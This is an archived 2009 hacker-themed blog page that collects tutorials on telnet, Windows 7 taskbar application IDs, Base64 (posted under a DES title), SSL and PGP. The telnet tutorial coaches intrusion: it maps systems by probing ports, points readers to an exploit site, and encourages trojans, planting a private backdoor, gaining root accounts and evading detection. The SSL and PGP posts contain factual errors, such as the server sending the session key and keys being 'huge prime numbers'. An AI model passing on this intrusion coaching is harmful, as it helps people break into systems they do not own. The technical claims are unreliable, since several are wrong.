hack hack reasearch facility

Telnet Basics Guides & Tutorials

2009-06-27T10:01:00.000-07:00

A tutorial on telnet for beginners. Explains what telnet is and how to use it.

here are sites that will allow you to play with telnet and try the things you have learned:

http://www.chem.ox.ac.uk/it/telnet.html
http://www.westwords.com/guffey/nettel.html

First of all what is telnet?Telnet is a protocol which is part of the TCP/IP suite. It is quite similar to the UNIX rlogin program. Telnet allows you to control a remote computer from your own one. It is terminal emulation software. In the old days harddrives were humonguous and expensive (i am talking waY back here) and there were no personal computers. To make use of existing computers you had to lease hardrive space and use terminals to operate the system. For developers this was great because computing became lots cheaper. You needed a server and many connections could be made. With telnet u can emulate this type of distributed computing and for example operate a supercomputer from a distance.

TCP/IP works with ports and telnet has one also. It's nr 23. It's has several rfc's. Nr 854 dates back to 1983 and is named telnet protocol specification.
With telnet you can do various things like send mail, log in to irc or proxy and even (though hardly anymore) view and modify websites. There are telnet services available allowing you to search through large databases using telnet. With this you use the remote computer's power so it won't presure your precious resources. Usually help or remotehelp are the commands to use to find out what you can and cannot do. If you can't see what you type in then set echo. Once you made a connection you can use the computer as if it was your own. You use command lines for this.
Telnet knows different emulation types. VT-100 is most used. This emulation was used on the video terminals of DEC. There are still VT-100 servers running out there. Scientists use these.

To use telnet you need a client. Windows has telnet built in by default (as does UNIX but that's a different story), but there are third party clients available on the net. You start a telnet session by typing in the command 'telnet server.net 23' where the port number is optional. Since Telnet was based on UNIX (as it is part of TCP/IP which also was based on UNIX) it uses UNIX commands. Basic knowledge would help you here. The port number specifies what services you will use. 23 is the default one. You can log into various services. 80 is the HTTP server for that.
So say you wanted to modify your site from a distance on a leased line. You don't have your fav progs and hardly any time.
/* telnet server.net 80 (leave the /*)
/* GET http://www.server.net/YOURSITE.HTM HTTP/1.1
You can use this method to get the output of a cgi-script as well. The simple request doesn't use the HTTP/1.1 (this is the HTTP version running on the server). If you perform a bad request you usually get some info on the server. Use this to find a the correct versions of services running.
To put files to the server u use the PUT command. Telnet is pretty simillar to FTP which is also part of TCP/IP. There are other commands available like POST, which is used to put larger data files to the server, HEAD to get the sites header and DELETE. This one is obvious isn't it.
You can also use telnet to send raw imails. The port to login to is 25.
First you have to identify your self. This geos like this:
/* telnet mail.server.net 25
/* HELO www.you.net
When you typed this command you'll get some feedback telling you who and what you logged on to. When you login u may get also some feedback telling you things. :`;
After this you tell the server where the mail is from like this:
/* MAIL FROM:you@youradress.net
The server will give you feedback again telling you
/* ...Sender OK
You are accepted. Now for the receipant
/* RCPT TO:yourroommate@hisadress.net
again feedback
/* ...Receptient OK
The server stil does it's duty.....
/* DATA
After typing this command you'll get the instructions on the proper way to send the mail. Type your mail using the instructions. After you're done sending your mail close the connection using
/* QUIT (or END, EXIT, LOGOFF LOGOUT)
You can use this to receive your mail as well (if your provider allows you). The POP port is 110. Telnet to the server on this port. Once there use the following commands.
/* USER you@THE_SERVER_GOES_HERE.net
/* PASS ;type in your password (simple huh.).
Once you are accepted as a valid user use the following to list your mail.
/* LIST
Ports can be configured so they may be different on some systems. Many admins use the default ones though.

Two things come in handy when completly understanding telnet and how it works. They are a basic understanding of TCP/IP and a basic understanding of UNIX commands.

You could use telnet to connect to a proxy and from there on continue your quest. Find a good proxy (use a search engine to locate one) and create an account. Now telnet to the server on the port specified on the website and hang loose. Using a proxy to use the web keeps your identity better hidden. Proxies often use port 8080 or 3128. If you use IE or Netscape you configure them to use a proxy. If you have computer friends maybe they could help you locate one nearby. To learn more about proxies read a tutorial about them. Telnet is part of TCP/IP and with this comes specific built in connection security. This basicly comes down to the three-way-handshake which i will not furtherly discuss in this tut. Terminal emulation was embraced by developers because it is a quick and secure way for remote computing.

Bcause telnet is developed to be quick and reliable you could use it to connect yourself to an irc-server and chat with your buddies without a resource consuming GUI. You may even want to use a proxy to keep the (f)lamers from finding out your ip. To do this you have to know that the irc protocol has it's ports dedicated to 6666:6669. Ports can be configured so you have to know to what port you should connect. The identd runs on port 113. Better use a shell account to connect to IRC servers or a GUI client. Once you are there u can use the usual irc commands. If you have got a good shell (command.com) you can use scripts to automate procedures. To learn more about irc: Request for Comments: 1459 Internet Relay Chat Protocol. mIrc is a pretty good irc-client for nowadays high resource conputers if you want to learn this to. Since linux was built on UNIX and linux is free, you should have by now installed this operating system. OK
U can also post to newsgroups if the server allows this. Newsgroups use nntp (rfc 977) over port 119. Use your skills. If you want to get information on a particular system you can use a technique known as port scanning. There are pretty fancy port scanners on the net but to become a guru you will have to know how hits take place. So use port surfing instead. Telnet to the server on various ports to get info on services. This is much more rewarding then using someone else's portscanner. If you want to become a good hacker learn a programming language and write your own. Because TCP/IP is not designed for a specific platform it works much the same on any. TCP/IP uses ports that have certain services.
There are severel interresting ports for trying telnet like 7:echo. This one replies whatever you type in.
13 daytime
15 netstat
37 time time
39 rlp
53 domain
119 nntp
443 https

Use your commands to get the requested info. By connecting to different services you get a clear look at the system in use. If you want to exploit a system use the info and go to exploiters.net. If you come across a system you don't know read the ALT.2600.FAQ.
There are also a lot of trojans circulating (like back orifice or netbus). If you know how to use these you can do some rad things but mostly the use if trojans is considered lame. Learn the commands and setup your private backdoor. When you want to attack a system prepare yourself for this. There has been some discussion on the legality of port-scanning/surfing. Many servers log every attempt to connect to it. Be warned.
The expansion of free software towards the windows market gives great tools to set up your own hackerlab. For this you use your computer and one other. Set up a simple network with a server.
Configure the server and start hacking.
If you have a root account on a telnet server you can use this to remotely administer the server. There are many wats to get a root account. Remember that if an administrator finds a new root account on his system he will know it has been tampered with. Covering your tracks is fatal if you want to stay uncaught. Telnetting from a PDA is a pretty fancy way to read your mail or post to newsgroups from a distance. Because GSM phones can only transmit upto 9600 bps you might not want to load up the web.

U can use telnet to create a shell account. This allows you to use a good shell even though u use Microsoft OS. Shell accounts vary in the services they have available. To find a good shell account search the net or try freeshell.org. Look for a shell that offers the progs you'dd like to use.

Developing for the Windows 7 Taskbar – Application ID

2009-06-21T02:31:00.001-07:00

I assume that by now you are familiar with the basic functionality that Windows 7 Taskbar offers and the reasons behind the change we made from previous taskbar versions. If you are not familiar with and haven’t seen any demonstrations of the Windows 7 Taskbar, please watch the Windows 7 Taskbar Overview webcast on Channel 9. There are also great posts on the E7 blog like The Windows 7 Taskbar about some of the reasons we introduced the new Taskbar and desktop experience in Windows 7. I do encourage you to read these posts and watch the video so that you have some context for the technical material we are going to cover here.

The new Taskbar is probably the most noticeable change to Windows 7 when you first log on. The Windows 7 Taskbar is an application-launching and window-switching mechanism that consolidates the functions of previous Windows Desktop mechanisms, such as Quick Launch, Recent Documents, Notification Area icons, desktop shortcuts, and running application windows. Windows 7 Taskbar offers features like Jump Lists, Preview Handler, and Overlay Icons. But before we start diving into the various Windows 7 Taskbar features, let’s lay the basic foundation to our discussion and define some Windows 7 taskbar terminology.

for example, the Media Player button has no frame or border, but simply sits directly on the Taskbar. This indicates that Media Player is not running. But it is pinned to the Taskbar, and will stay on the Taskbar unless we unpin it. A transparent frame that lets most of the color of the underlying Taskbar through the Windows Explorer button. This indicates that the app is running but is not the active application. The Visual Studio icon has a more opaque rectangular frame underlying its icon indicating that the user is actively using this app. You will also notice that Word has a “stack” of icons representing that multiple instances of Word or multiple Windows are grouped under the same Taskbar button. It is very important to understand the logic that underlies the creation, assignment, and grouping of Taskbar buttons.

A very large number of applications that run on Windows 7 (for example, Office Word 2007 and Visual Studio 2008), were not designed to work with the Windows 7 Taskbar, so how is it that they can play ball with the Taskbar, group multiple instances, and even take advantage of Word Jump Lists? Basically, a behind-the-scenes Application ID (AppID) is automatically computed and assigned to an application once you launch it. Every running application has an AppID assigned to it, either automatically computed for the app by Windows, or set by the app itself. Guess what? It is not a GUID; it is just a string (with a maximum of 128 characters), that either you provide or is being computed by the OS. All windows and applications, including Jump Lists, which have the same AppID are grouped under the same Taskbar button. Therefore, it is important to understand that every component (process, shortcut, window, Taskbar button, and document type – that is, registered file type handler) of your application has the AppID associated with it.

You may ask, "Where do AppIDs come from?" As mentioned before, the OS generates Application IDs for your application using a very simple, yet important to understand heuristic. Since in Windows 7 you can assign AppIDs to individual windows, the OS tries to extrapolate the AppID from a window. Applications usually display at least one window that the OS can query for its AppID. However, most existing apps do not have an AppID attached to each window (or, for that matter, any AppID at all), and therefore the OS falls back to the process to which the window belongs for the AppID. Each process has several properties that the OS can check, like the executable of the process. But even then, the process may not provide a granular enough separation. Different shortcuts may provide different start up command line parameters to the same executable and launch different applications (imagine a “launcher” application) that will be grouped under the same Taskbar button. In such cases, the OS has the ability to look into the specific shortcut that launched the application, to find the executable, the command line parameters, and so on. Note that if you have a register file, this registration points to an application that gets launched once you double click that file. Again, this is another way to calculate the AppID. The following image illustrates this automatic computation process.

While the OS can compute AppIDs for you, you may want to have greater control over the AppID for a given application or even an individual window in your application. Assume that you have an application that hosts (runs) another application (like what happens when you debug an application using Visual Studio). Or you have several different applications or processes that you wish to group under the same Taskbar button. The Taskbar API offers you ways to control the Application ID per application or per window. IN ANY CASE, if you are writing a new application that targets Windows 7, we highly recommend that you provide your own application ID, as we will describe below.

OK, let’s examine the API that allows you to control the AppID associations of your application.

If you want to have a separate Taskbar button for each process (including all windows owned by that process), you can set an explicit AppID for the entire process that affects all windows within the process that do not have their own explicit AppID. Setting the explicit process AppID is very easy. All it takes is a single call to the SetCurrentProcessExplicitAppUserModelID function as shown in the following code snippet:

SetCurrentProcessExplicitAppUserModelID(c_rgszAppID[0]);

Where c_rgszAppID[0] is a pointer to a string. You should note that according to the SDK documentation, “This method must be called during an application's initial startup routine before the application presents any user interface (UI) or makes any manipulation of its Jump Lists.”

In managed code, from the latest Windows API Code Pack Library, you can use the AppID property that is part of the Taskbar object, which you can find in the Microsoft.WindowsAPICodePack.Shell.Taskbar namespace. Using that property you can set and get the application ID of a given application.

Setting the AppID for a window is a bit more complicated (but only a bit). It requires calling the SHGetPropertyStoreForWindow function and then manipulating the resulting IPropertyStore object to retrieve the requested property as shown in the following code snippet:

void SetAppID(HWND hWnd, int iAppID)
{
IPropertyStore *pps;
HRESULT hr = SHGetPropertyStoreForWindow(hWnd, IID_PPV_ARGS(&pps));
if (SUCCEEDED(hr))
{
PROPVARIANT pv;
if (iAppID >= 0)
{
hr = InitPropVariantFromString(c_rgszAppID[iAppID], &pv);
}
else
{
PropVariantInit(&pv);
}
if (SUCCEEDED(hr))
{
hr = pps->SetValue(PKEY_AppUserModel_ID, pv);
PropVariantClear(&pv);
}
pps->Release();
}
}

Here you can see how we extract the current windows property store by calling SHGetPropertyStoreForWindow, passing hWnd as refrence to the window. Next we initiate, InitPropVariantFromString(c_rgszAppID[iAppID], &pv), a property variant with a string that represents the AppID for that window. Finally, we set the value of the new property store to the window.

Unfortunately, the current Windows API Code pack doesn’t support setting specific application IDs per window, although all you need to do is add the following function to the Taskbar.cs file:

private static void SetWindowAppId(string appId)
{
Microsoft.WindowsAPICodePack.Shell.ShellNativeMethods.SetWindowAppId
(OwnerHandle, "name here");
}

Since the Windows API Code Pack provides the source code, you can actually check the specific implementation of SetWindowAppId function and see for yourself that it is very similar to the SetAppID example above. Note you don’t have to use the full qualified assembly name “Microsoft.WindowsAPICodePack.Shell’, but I did to help you navigate the Windows API Code Pack hierarchy.

By the way, the window AppID is dynamic, so it’s entirely possible for a window to show up as part of one Taskbar button and then change its AppID so that it appears on an entirely different Taskbar button. This has interesting effects. For example, the Jump List is attached to a Taskbar button (with a specific AppID), so the same window might show a different Jump List when it is reattached to an entirely different Taskbar button. This potentially can confuse users, so the recommended practice is to set the window AppID and stick to it, using the same process for determining the AppID every time the window displays.

Data Encryption Standard or DES

2009-02-06T02:38:00.000-08:00

Since its introduction, Base64 encoding has extremely quickly gained popularity. Besides being the default Encoding standard being used for encoding files to be sent as attachments by Multipurpose Internet Mail Extensions or MIME, it has also started being used in a number of other places.

Please note that almost all email clients use MIME to send files as attachments, this in turn means that a majority of email clients are using Base64 to encode files, before being sent across networks.

Another popular usage of Base64 encoding is in the case of Web Servers implementing HTTP Based Basic Authentication. When the server wants to restrict or control the access to certain folders, then, it can password protect them by using HTTP Based Basic Authentication. Basic Authentication uses the Base64 Encoding standard to encode the Username and Password and store them.

So, basically what my point is that Base64 Encoding has a number of practical usages and due to the fact that it is very easy to implement, it is being put to use for a number of purposes at a number of places by a number of parties. Get my point?

However, it continues to remain by far the lamest encoding standard or the poorest means of security. You see instead of the text being passed through a powerful, difficult to break algorithm and being encrypted, it is only being encoded by a relatively simple to reverse encoding standard.

Base64 uses a 65-character subset of US-ASCII, allowing 6 bits for each character. For Example, take the character ‘m’ for instance. The character ‘m’ has a Base64 value of 38. How did we get this value? Well, there is a Base64 Alphabet chart included at the end of this tutorial, which contains all the alphabets and their corresponding Base64 value. So, each time you want to get the Base64 value of an ASCII character, you need to refer to this Base64 Value chart. Anyway, getting back to our example, the character ‘m’ has a Base64 value of 38, which when represented in binary form, is 100110.

Now, let us take yet another example to see how a text is encoded by Base64 Encoding. Say, that the text to be encoded is: ‘mne’. The text is firstly converted into its decimal value.

The character "m" has the decimal value of 109

The character "n" has the decimal value of 110

The character "e" has the decimal value of 101

This implies that "mne" ( three 8-bit-byte text string) is 109 110 101 in decimal form. When converted to binary the string looks like this:

01101101 01101110 01100101

These three 8-bit-bytes are concatenated (linked together) to make a 24-bit stream:

011011010110111001100101

This 24-bit stream is then split up into four 6-bit sections:

011011 010110 111001 100101

We now have 4 values. These binary values, when converted into decimal form look like this:

27 22 57 37

Now each character of the Base64 character set has a decimal value. We now change these decimal values into the Base64 equivalent:

27 = b

22 = w

57 = 5

37 = l

So "mne" when encoded as Base64 reads as "bw5l". Below is a table of the Base64 character set with their decimal values:

Table 1: The Base64 Alphabet

Value Encoding

Value Encoding

Value Encoding

Value Encoding
0 A

17 R

34 i

51 z
1 B

18 S

35 j

52 0
2 C

19 T

36 k

53 1
3 D

20 U

37 l

54 2
4 E

21 V

38 m

55 3
5 F

22 W

39 n

56 4
6 G

23 X

40 o

57 5
7 H

24 Y

41 p

58 6
8 I

25 Z

42 q

59 7
9 J

26 a

43 r

60 8
10 K

27 b

44 s

61 9
11 L

28 c

45 t

62 +
12 M

29 d

46 u

63 /
13 N

30 e

47 v

(pad) =
14 O

31 f

48 w

15 P

32 g

49 x

16 Q

33 h

50 y

When decoding a Base64 string just do the reverse:

1) Convert the character to its Base64 decimal value.

2) Convert this decimal value into binary.

3) Squash the 6 bits of each character into one big string of binary digits.

4) Split this string up into groups of 8 bits (starting from right to left).

5) Convert each 8-bit binary value into a decimal number.

6) Convert this decimal value into its US-ASCII equivalent.

For those of you who do not want to use the manual method of decoding a Base64 encoded value, I have the following Perl script, which will do it for you:

use MIME::Base64;

print decode_base64("Insert Text to be decoded here.");

Here's the C source code for the Base 64 encoder/decoder.

/*

Dave Winer, dwiner@well.com, UserLand Software, 4/7/97

*/

#include

#include

#include "base64.h"

static char encodingTable [64] = {

'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',

'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',

'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',

'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'

};

static unsigned long gethandlesize (Handle h) {

return (GetHandleSize (h));

} /*gethandlesize*/

static boolean sethandlesize (Handle h, unsigned long newsize) {

SetHandleSize (h, newsize);

return (MemError () == noErr);

} /*sethandlesize*/

static unsigned char gethandlechar (Handle h, unsigned long ix) {

return ((*h) [ix]);

} /*gethandlechar*/

static void sethandlechar (Handle h, unsigned long ix, unsigned char ch) {

(*h) [ix] = ch;

} /*sethandlechar*/

static boolean encodeHandle (Handle htext, Handle h64, short linelength) {

/*

encode the handle. some funny stuff about linelength -- it only makes

sense to make it a multiple of 4. if it's not a multiple of 4, we make it

so (by only checking it every 4 characters.

further, if it's 0, we don't add any line breaks at all.

*/

unsigned long ixtext;

unsigned long lentext;

unsigned long origsize;

long ctremaining;

unsigned char ch;

unsigned char inbuf [3], outbuf [4];

short i;

short charsonline = 0, ctcopy;

ixtext = 0;

lentext = gethandlesize (htext);

while (true) {

ctremaining = lentext - ixtext;

if (ctremaining <= 0)

break;

for (i = 0; i < 3; i++) {

unsigned long ix = ixtext + i;

if (ix < lentext)

inbuf [i] = gethandlechar (htext, ix);

else

inbuf [i] = 0;

} /*for*/

outbuf [0] = (inbuf [0] & 0xFC) >> 2;

outbuf [1] = ((inbuf [0] & 0x03) << 4) | ((inbuf [1] & 0xF0) >> 4);

outbuf [2] = ((inbuf [1] & 0x0F) << 2) | ((inbuf [2] & 0xC0) >> 6);

outbuf [3] = inbuf [2] & 0x3F;

origsize = gethandlesize (h64);

if (!sethandlesize (h64, origsize + 4))

return (false);

ctcopy = 4;

switch (ctremaining) {

case 1:

ctcopy = 2;

break;

case 2:

ctcopy = 3;

break;

} /*switch*/

for (i = 0; i < ctcopy; i++)

sethandlechar (h64, origsize + i, encodingTable [outbuf [i]]);

for (i = ctcopy; i < 4; i++)

sethandlechar (h64, origsize + i, '=');

ixtext += 3;

charsonline += 4;

if (linelength > 0) { /*DW 4/8/97 -- 0 means no line breaks*/

if (charsonline >= linelength) {

charsonline = 0;

origsize = gethandlesize (h64);

if (!sethandlesize (h64, origsize + 1))

return (false);

sethandlechar (h64, origsize, '\n');

}

}

} /*while*/

return (true);

} /*encodeHandle*/

static boolean decodeHandle (Handle h64, Handle htext) {

unsigned long ixtext;

unsigned long lentext;

unsigned long origsize;

unsigned long ctremaining;

unsigned char ch;

unsigned char inbuf [3], outbuf [4];

short i, ixinbuf;

boolean flignore;

boolean flendtext = false;

ixtext = 0;

lentext = gethandlesize (h64);

ixinbuf = 0;

while (true) {

if (ixtext >= lentext)

break;

ch = gethandlechar (h64, ixtext++);

flignore = false;

if ((ch >= 'A') && (ch <= 'Z'))

ch = ch - 'A';

else if ((ch >= 'a') && (ch <= 'z'))

ch = ch - 'a' + 26;

else if ((ch >= '0') && (ch <= '9'))

ch = ch - '0' + 52;

else if (ch == '+')

ch = 62;

else if (ch == '=') /*no op -- can't ignore this one*/

flendtext = true;

else if (ch == '/')

ch = 63;

else

flignore = true;

if (!flignore) {

short ctcharsinbuf = 3;

boolean flbreak = false;

if (flendtext) {

if (ixinbuf == 0)

break;

if ((ixinbuf == 1) || (ixinbuf == 2))

ctcharsinbuf = 1;

else

ctcharsinbuf = 2;

ixinbuf = 3;

flbreak = true;

}

inbuf [ixinbuf++] = ch;

if (ixinbuf == 4) {

ixinbuf = 0;

outbuf [0] = (inbuf [0] << 2) | ((inbuf [1] & 0x30) >> 4);

outbuf [1] = ((inbuf [1] & 0x0F) << 4) | ((inbuf [2] & 0x3C) >> 2);

outbuf [2] = ((inbuf [2] & 0x03) << 6) | (inbuf [3] & 0x3F);

origsize = gethandlesize (htext);

if (!sethandlesize (htext, origsize + ctcharsinbuf))

return (false);

for (i = 0; i < ctcharsinbuf; i++)

sethandlechar (htext, origsize + i, outbuf [i]);

}

if (flbreak)

break;

}

} /*while*/

exit:

return (true);

} /*decodeHandle*/

void base64encodeVerb (void) {

Handle h64, htext;

short linelength;

if (!IACgettextparam ((OSType) keyDirectObject, &htext))

return;

if (!IACgetshortparam ((OSType) 'line', &linelength))

return;

h64 = NewHandle (0);

if (!encodeHandle (htext, h64, linelength))

goto error;

DisposHandle (htext);

IACreturntext (h64);

return;

error:

IACreturnerror (1, "\perror encoding the Base 64 text");

} /*base64encodeVerb*/

void base64decodeVerb (void) {

Handle h64, htext;

if (!IACgettextparam ((OSType) keyDirectObject, &h64))

return;

htext = NewHandle (0);

if (!decodeHandle (h64, htext))

goto error;

DisposHandle (h64);

IACreturntext (htext);

return;

error:

IACreturnerror (1, "\perror decoding the Base 64 text");

} /*base64decodeVerb*/

------------------------------------------

Well, that is all for now. Hope you liked the manual. Bye.

Secure Sockets Layer or SSL

2009-02-06T02:36:00.002-08:00

Secure Sockets Layer or SSL is a secure protocol, which is the reason why secure E-Commerce and E-Banking is possible. It has become the de facto standard for secure and safe only transactions. When Netscape first developed SSL, the main aim or motive behind it was to ensure that the client and host can communicate or transfer data and information securely.

What SSL does in short would be, encrypt data at the sender’s end and decrypt data at the receiver’s end. This encrypted data cannot be picked up or hijacked in between and any tampering would not only be very difficult, it would easily be detected. Not only that, SSL also provides for two-way authentication i.e. verification of the client’s and the server’s identity.

The various functions or features of SSL can be divided into three main categories-:

1. SSL Encrypted Connection-: Provides for secure and safe transaction of encrypted data between the client and the host.
2. SSL Client Authentication: is an optional feature, which allows for verification of the client’s identity.
3. SSL server Authentication: provides for verification of the server’s Certificate Authority (CA) which is nothing but a trusted safe host certificate given to the server by companies like Verisign, Cybertrust, Thawte and more.

The main SSL protocol is made up of two smaller sub-protocols-:

1. The Secure Sockets Layer Record Protocol or The SSL Record Protocol.
2. The Secure Sockets Layer Handshake Protocol or The SSL Handshake Protocol.

The SSL Record Protocol looks after the transmission and the transmission format of the encrypted data. Also it is this sub-protocol of SSL, which ensures data integrity in the transfer process. On the other hand the SSL Handshake protocol basically helps to determine the session key. To understand both these protocols better, read on.

****************

Hacking truth: A session key is a secret symmetrical key, which is used to encrypt data, after a SSL connection has been established between the client and the host.

****************

Secure Sockets Layer: The Working

Now as soon as you enter a secure site, SSL comes into play. But how do you know whether the connection is secure or not? Well, there are several things, which reveal the fact that whether your connection is unsafe or safe.

The most common way to check whether your connection is secure or not is to look at the status bar of your browser. If you see a closed padlock, then the connection is secure, else if you see a open padlock, then the connection is not secure. Another area to watch out for is the browser URL box. Now on an unsecured connection you will see only a http:// before the other part of the URL of the site you are visiting. On the other hand, if the connection is secure then you will see a https:// instead.

Another technique to ensure that you are on a secure connection is to have a look at the Certificate Authority or CA or the server. How do I do that? Well, simply right click on the page that you suspect to be on a unsecured connection, and select Properties. A properties box pops up. Now look for the Connection field. A typical Connection field would be as follows-:

SSL 3.0, DES with 40 bit Encryption [Low]; RSA with 128 bit exchange.

This means that SSL 3.0 is running, DES is the crypto system being used and it has 40-bit encryption level. And RSA is the public key encryption algorithm being used and in this case it used 128 bits.

Anyway, let me start from what happens, once you are already on a secure connection. Now as soon as the browser knows that a secure connection is present, The SSL Handshake Protocol jumps into action. It sends the browser’s SSL version number, Encryption settings and other crypto information to the remote host. Once the remote server receives this, it in turn sends back to the client, its SSL number and cipher settings.

Also, if the server wants to, then this is the time when it verifies the client’s certificate. [This is done only if

an optional SSL feature, The SSL Client Authentication feature is present.]

NOTE: Client Authentication can also be done at a later stage. It basically varies from Server to server, as to when this authentication is done, or whether it is done at all.

Then, the client verifies the server’s Certificate Authority. This is done to ensure that the public key received by the client is that of the correct authentic server. If the server does not have a CA certificate or if the certificate has expired, then a dialog box pops up informing the user. [Warning the user]

Once the server’s identity has been authenticated, then the client creates a ‘Premaster Secret’ which is unique for each new SSL session. This ‘Premaster Secret’ is then encrypted using the server’s Public Key and this encrypted Premaster secret is then sent to the server. The important thing to note here is that the Server’s Public Key is extracted from the server’s Digital Certificate, which is nothing but a digitally signed certificate containing the owner’s public key.

Now, when the server receives the encrypted premaster secret, it verifies the client’s identity. [This is optional and varies from server to server] Anyway, Once the client’s identity has been authenticated, the server uses its private key to decrypt the premaster secret, to obtain the master secret. This master secret is used to determine the session key.

Note: The transfer of the premaster and master is also done for compatibility reasons.

Now, everything till now is handled by The SSL Handshake Protocol. Once all this is done, The SSL Record Protocol comes into the picture. Now, once the server has determined, the symmetrical session key, it sends it to the client and further communication is done using this session key. As the key is symmetrical, it can be used for both decrypting and encrypting purposes. The SSL Record Protocol handles all data transfer

A typical SSL transaction involves various encryption algorithms like RSA and DSS. Other popular ones are DES and RC4. Data integrity is ensured by using ciphers like MD5, SHA etc, which are called Message Authentication Codes or MAC. A MAC is nothing but a checksum authentication thingy which converts the data into digits. The checksum value at the receiver’s end is compared to that at the sender’s end. If any tampering If any tampering is done or in other words, if the checksums do not match, then that particular session is considered void and the entire above process if repeated i.e. data is transmitted again.

However, SSL is not as secure as it seems to be. The problem lies in the fact that the encryption algorithms used along with SLL are quite lame and can easily be cracked. All versions below 3.0 have been cracked, however SSL 3.0 with 128 bits would take a very very long time to crack, if it could be cracked. So it is quite same to a certain extend.

So how do you ensure that your SSL transaction is secure? Well, the best thing to do is to use 128-Bit encryption instead of 40-Bit. The former has 3 * 1026 more keys than the latter. Also install the latest version of your browsers, to ensure that you have the latest encryption standards and security patches.

NOTE: 168-Bit encryption is present too, however, encryption levels over 40 bits are not allowed outside the US.

PGP Encryption for Beginners

2009-02-06T02:36:00.001-08:00

Contents
========

Why Encrypt?
What is PGP?
Introduction to Cryptography.
Main Types of Cryptography.
How Does Cryptography Work?
Conventional Cryptography
Public Key Cryptography
How Does PGP Work?
A Few Words About The Keys...
..And About Digital Signatures
The Message Digest
Digital Certificates
Certificate Formats
Validity and Trust
Passwords and Passphrases

Why Encrypt?
============

Why the hell would you want to encrypt your data anyway? Well, for several reasons:

(1) Suppose someone breaks into your computer. Instead of being able to quickly grab all of your credit card numbers, passwords etc', if you've encrypted your data he will only get encrypted garbage, which will mean nothing to him, and will be excruciatingly hard to decipher.

(2) Suppose you're not the only one using your computer. Would you risk putting your private information wide-open to strangers and maybe even malicious users? I wouldn't.

I hope you get my drift. Now, let's move on.

What is PGP?
============

PGP (Pretty Good Privacy) - is an encrypting technology which combines features of both conventional and public key cryptography (the keys we will discuss later in this topic) and is sometimes called a hybrid cryptosystem.

Introduction to Cryptography
============================

At first, I would like to introduce you to some new words, which will be widely used in this tutorial:

1. "Plain text" or "clear text" is unencrypted data, which can be read and easily understood and has not been encrypted. This tutorial is written in clear text, for example.
2. Encryption - the process of changing plain text into ciphertext.
3. Ciphertext - is the result of encryption - meaningless garbage at first sight. (One of the meanings is "an obsolete name for zero).
4. Decryption - it is a method to convert readable data from Ciphertext.
5. Cryptography - the science of encryption.
6. Cryptanalysis - a branch of mathematics that involves breaking encrypted data mathematically or statistically.
7. Attackers - anybody who tries to get cleartext from ciphertext without authorisation.
8. Cryptology - synonym for cryptography
9. Cipher - an algorithm or mathematical function that converts plaintext to ciphertext.
10. Cryptosystem - a cipher and all the tools/algorithms associated with it

Here is logical chain of all this process:

PLAINTEXT --> ENCRYPTION --> CIPHERTEXT --> DECRYPTION --> PLAINTEXT

\

-> SUCCESSFUL ATTACK --> PLAINTEXT

Cryptography actually is a mathematical science. It uses mathematics to encrypt / decrypt data in order to store it or to transfer it securely across an insecure network (the internet for example, but it could be any other type of network, not even the electronic type) to ensure that information is only available to authorized people.

Main types of Cryptography
==========================

A cryptosystem can be weak (easy to break), or it can be strong (hard to break). The strength of a cryptosystem is measured in the time and resources you need to get make a successful attack. Modern strong cryptosystems can withstand a brute force attack using all the computers in the world - or rather, it would take an inordinately long time (currently about 10^9 times the age of the universe). But you never know - tomorrow may bring a mathematical technique to attack these cryptosystems by a method other than brute force.

How does Cryptography work?
===========================

A cipher uses a key (a piece of data) coupled with an encryption algorithm to encrypt data (plain text). Different keys produce different ciphertext, of course. So the strength of encrypted data relies on two factors - the strength of cipher and the safety of the key. Therefore it is very advisable to choose the key very carefully and to keep it secure (best solution is to put it into a brain-cell, if possible:)). All those components mentioned above build a cipher. A cryptosystem (like PGP) uses a combination of various different ciphers .

Conventional Cryptography
=========================

This type of encryption uses the same key to encrypt and decrypt data (plaintext). An example of a conventional cryptosystem is DES (The Data Encryption Standard) which is recommended by the Federal Government for commercial applications (despite the fact that it can be broken very easily). Conventional Cryptography has both pluses and minuses. It is very fast and suitable for data which won't be used by anyone except by the person who encrypted it. Unfortunately the secure key distribution is very difficult task to accomplish: you need to agree with a key beforehand, which is very impractical nowadays, because you cannot trust phone companies, couriers, e-mail and internet services. Here arises a question: how do you get the key to the recipient without someone intercepting it? The best way would be to have different keys for the sender and recipient.

Public Key Cryptography
=======================

Which solves the secure key distribution problem. Whitefield Diffie and Martin Helman introduced the concept of Public Key Cryptography in 1975. However, there are some rumours that British Secret Intelligence Service invented it few years before, but kept in secret and did nothing with it.
Public key cryptography is an asymmetric system and uses two keys (a pair): a public key, used for encryption and a private key, used for decryption. The public key is published worldwide and the personal is kept in secret. Anyone and everyone can encrypt data with your public key, but only you (or to be more exact the person who has your private key) can decrypt the ciphertext.

How Does PGP Work?
==================

As mentioned above, PGP is mixed cryptosystem - that is, it combines both conventional and public key cryptography. PGP operates in this way:

A) Encryption:

1) First, PGP compresses plaintext. It is useful for several reasons: you need less space on hard disk. smaller message means saving time (and money), when sending it via internet, and increases the strength of encryption, because in compressed data there are fewer patterns than in uncompressed and pattern recognition is widely used by cryptanalists to break a cipher.
2) PGP then generates a single-use encryption key, known as a session key. It is random number, generated from random data such as the contents of your PC's RAM, mouse movements, positions of windows on the desktop - uou get the idea. PGP uses a very fast and secure conventional cipher (CAST) and this session key to encrypt the data to produce ciphertext.
3) After encrypting of the data, the session key is then encrypted to the recipient's public key and both the public key-encrypted session key and the ciphertext are transmitted.

B) Decryption:

1) PGP uses the recipient's private key to recover the session key.
2) The session key is used to decrypt the conventionally encrypted ciphertext.
3) The compressed data is decompressed.

The combinations of conventional and public keys provide cryptography with very fast and secure encryption system. This is achieved by the speed of conventional algorithms and safety of public key.

A Few Words About The Keys...
=============================

A key is a piece of data which is used by cryptographic algorithm to produce cyphertext. In fact, keys are huge prime numbers. The size of the key is measured in bits - the bigger the key, the more secure the encryption. The comparison of conventional and public key sizes is rather puzzling - conventional 128-bit key is the same strength as 3072-bit public key. The thing is, that you can't compare those types of the key, because of the specific algorithms used for each type of cryptography. (you can't compare trains and brains, can you?).
To gain as much security as you can, always pick the biggest-size keys. This is because (given enough time and processing power) any public key can eventually be found. However, 2048-bit keys are in fact so difficult to break that it would take AT LEAST 2,000,000,000 years to break it using all the processing power to be found on the planet at the moment.
